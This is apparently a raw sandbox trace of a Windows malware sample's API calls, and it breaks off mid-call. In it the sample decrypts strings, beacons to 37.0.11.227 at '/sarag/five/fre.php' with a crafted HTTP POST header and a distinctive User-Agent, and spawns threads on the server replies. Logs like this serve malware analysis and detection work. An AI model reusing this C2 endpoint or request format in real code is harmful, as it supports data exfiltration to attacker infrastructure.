LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.850] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.851] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.851] GetProcessHeap () returned 0x690000 [0252.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0252.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.854] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0252.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.855] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.856] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0252.856] GetProcessHeap () returned 0x690000 [0252.856] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.858] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.859] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.860] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.861] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.861] GetProcessHeap () returned 0x690000 [0252.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0252.861] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.862] GetProcessHeap () returned 0x690000 [0252.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0252.862] GetProcessHeap () returned 0x690000 [0252.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.862] GetProcessHeap () returned 0x690000 [0252.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0252.863] GetProcessHeap () returned 0x690000 [0252.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0252.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.869] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0252.876] GetProcessHeap () returned 0x690000 [0252.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0252.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.877] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.878] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.879] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.879] GetProcessHeap () returned 0x690000 [0252.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0252.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.881] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0252.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.882] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.883] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0252.883] GetProcessHeap () returned 0x690000 [0252.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.884] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0252.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.885] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0252.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.886] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0252.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0252.887] GetProcessHeap () returned 0x690000 [0252.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0252.887] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0252.887] GetProcessHeap () returned 0x690000 [0252.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0252.887] socket (af=2, type=1, protocol=6) returned 0x720 [0252.888] connect (s=0x720, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0252.917] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0252.917] GetProcessHeap () returned 0x690000 [0252.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0252.917] GetProcessHeap () returned 0x690000 [0252.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0252.918] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.919] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.919] GetProcessHeap () returned 0x690000 [0252.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0252.919] GetProcessHeap () returned 0x690000 [0252.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.920] GetProcessHeap () returned 0x690000 [0252.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0252.920] GetProcessHeap () returned 0x690000 [0252.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0252.921] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.922] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.922] GetProcessHeap () returned 0x690000 [0252.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0252.922] GetProcessHeap () returned 0x690000 [0252.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.922] send (s=0x720, buf=0x6ad508*, len=242, flags=0) returned 242 [0252.923] send (s=0x720, buf=0x6aba40*, len=159, flags=0) returned 159 [0252.923] GetProcessHeap () returned 0x690000 [0252.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0252.923] recv (in: s=0x720, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0252.993] GetProcessHeap () returned 0x690000 [0252.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0252.993] GetProcessHeap () returned 0x690000 [0252.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0252.994] GetProcessHeap () returned 0x690000 [0252.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0252.994] GetProcessHeap () returned 0x690000 [0252.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0252.995] closesocket (s=0x720) returned 0 [0252.995] GetProcessHeap () returned 0x690000 [0252.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0252.995] GetProcessHeap () returned 0x690000 [0252.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.996] GetProcessHeap () returned 0x690000 [0252.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0252.996] GetProcessHeap () returned 0x690000 [0252.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0252.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x149c) returned 0x720 [0252.998] Sleep (dwMilliseconds=0xea60) [0253.000] GetProcessHeap () returned 0x690000 [0253.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0253.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0253.019] GetProcessHeap () returned 0x690000 [0253.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0253.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.023] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.025] GetProcessHeap () returned 0x690000 [0253.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0253.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.027] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0253.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.028] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.029] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0253.029] GetProcessHeap () returned 0x690000 [0253.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.033] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.034] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.037] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.037] GetProcessHeap () returned 0x690000 [0253.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.037] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.037] GetProcessHeap () returned 0x690000 [0253.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.038] GetProcessHeap () returned 0x690000 [0253.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.038] GetProcessHeap () returned 0x690000 [0253.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0253.044] GetProcessHeap () returned 0x690000 [0253.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0253.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.051] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0253.060] GetProcessHeap () returned 0x690000 [0253.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0253.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.061] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.063] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.064] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.064] GetProcessHeap () returned 0x690000 [0253.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0253.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.068] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0253.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.069] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.070] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0253.070] GetProcessHeap () returned 0x690000 [0253.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.072] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0253.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0253.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.074] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0253.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0253.077] GetProcessHeap () returned 0x690000 [0253.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0253.078] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0253.078] GetProcessHeap () returned 0x690000 [0253.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0253.078] socket (af=2, type=1, protocol=6) returned 0x724 [0253.078] connect (s=0x724, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0253.105] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0253.105] GetProcessHeap () returned 0x690000 [0253.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0253.105] GetProcessHeap () returned 0x690000 [0253.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0253.106] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.107] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.107] GetProcessHeap () returned 0x690000 [0253.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0253.107] GetProcessHeap () returned 0x690000 [0253.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.107] GetProcessHeap () returned 0x690000 [0253.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0253.107] GetProcessHeap () returned 0x690000 [0253.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0253.108] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.111] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.111] GetProcessHeap () returned 0x690000 [0253.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0253.111] GetProcessHeap () returned 0x690000 [0253.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.112] send (s=0x724, buf=0x6ad508*, len=242, flags=0) returned 242 [0253.112] send (s=0x724, buf=0x6aba40*, len=159, flags=0) returned 159 [0253.113] GetProcessHeap () returned 0x690000 [0253.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0253.113] recv (in: s=0x724, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0253.184] GetProcessHeap () returned 0x690000 [0253.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0253.184] GetProcessHeap () returned 0x690000 [0253.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0253.184] GetProcessHeap () returned 0x690000 [0253.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0253.184] GetProcessHeap () returned 0x690000 [0253.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0253.185] closesocket (s=0x724) returned 0 [0253.189] GetProcessHeap () returned 0x690000 [0253.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0253.189] GetProcessHeap () returned 0x690000 [0253.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.189] GetProcessHeap () returned 0x690000 [0253.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0253.190] GetProcessHeap () returned 0x690000 [0253.190] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0253.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14ac) returned 0x724 [0253.191] Sleep (dwMilliseconds=0xea60) [0253.193] GetProcessHeap () returned 0x690000 [0253.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0253.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.204] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0253.213] GetProcessHeap () returned 0x690000 [0253.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0253.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.214] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.227] GetProcessHeap () returned 0x690000 [0253.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0253.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.235] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0253.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.238] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.239] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0253.239] GetProcessHeap () returned 0x690000 [0253.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.240] StrStrA 